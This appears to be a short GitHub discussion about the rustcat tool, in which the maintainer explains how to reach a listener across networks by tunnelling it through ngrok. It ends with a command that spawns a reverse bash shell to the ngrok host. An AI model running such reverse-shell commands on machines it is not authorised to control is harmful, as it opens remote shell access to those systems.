### DISCUSSION TITLE
Rustcat over wan?

### DISCUSSION THREAD

**Discussion by ducier** [robiot/rustcat#29] [Q&A]
How would I make someone connect to my listener from another network?

**Comment by robiot** [comment]
You could port-forward your network normally or use ngrok (Recommended).

With ngrok:
1. Start your listener on specified port. Ex `rcat -lHp 5555`
2. Download [Ngrok](https://ngrok.com), create a ngrok account and authenticate with your token
3. Run `ngrok tcp 5555` where 5555 was the port you specified. This will create a tunnel from your computer to their servers which allows connections from other computers.
4. You will see something like `Forwarding                    tcp://1.tcp.ngrok.io:12711 -> localhost:5555`. The 1.tcp.ngrok.io is the host and the numbers after is the port.
5. Connect to the listener from another network with `rcat -r bash 1.tcp.ngrok.io 12711`
